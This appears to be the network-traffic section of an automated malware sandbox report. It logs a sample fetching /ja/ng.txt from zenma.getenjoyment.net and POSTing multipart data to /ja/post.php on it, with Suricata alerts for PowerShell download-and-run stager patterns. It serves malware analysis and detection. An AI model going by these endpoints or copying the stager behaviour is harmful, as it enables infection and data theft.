Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
zenma.getenjoyment.net | 185.176.43.106 | |
GET 200 http://zenma.getenjoyment.net/ja/ng.txt

Request:

```
GET /ja/ng.txt HTTP/1.1
Host: zenma.getenjoyment.net
Connection: Keep-Alive
```

Response:

```
HTTP/1.1 200 OK
Date: Tue, 03 Aug 2021 05:13:32 GMT
Server: Apache
Last-Modified: Mon, 02 Aug 2021 00:21:19 GMT
ETag: "1201-5c8888c5a3056"
Accept-Ranges: bytes
Content-Length: 4609
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
```
POST 100 http://zenma.getenjoyment.net/ja/post.php

Request:

```
POST /ja/post.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----MD5AHRE7932DDKSLIEJDKF
Host: zenma.getenjoyment.net
Content-Length: 16977
Expect: 100-continue
```

Response:

```
HTTP/1.1 100 Continue
```
POST 100 http://zenma.getenjoyment.net/ja/post.php

Request:

```
POST /ja/post.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----MD5AHRE7932DDKSLIEJDKF
Host: zenma.getenjoyment.net
Content-Length: 268
Expect: 100-continue
```

Response:

```
HTTP/1.1 100 Continue
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 185.176.43.106:80 -> 192.168.56.102:49166 | 2026989 | ET INFO PowerShell Hidden Window Command Common In Powershell Stagers M1 | A Network Trojan was detected |
TCP 185.176.43.106:80 -> 192.168.56.102:49166 | 2026995 | ET INFO PowerShell DownloadString Command Common In Powershell Stagers | A Network Trojan was detected |
Suricata TLS
No Suricata TLS alerts.
Snort Alerts
No Snort alerts.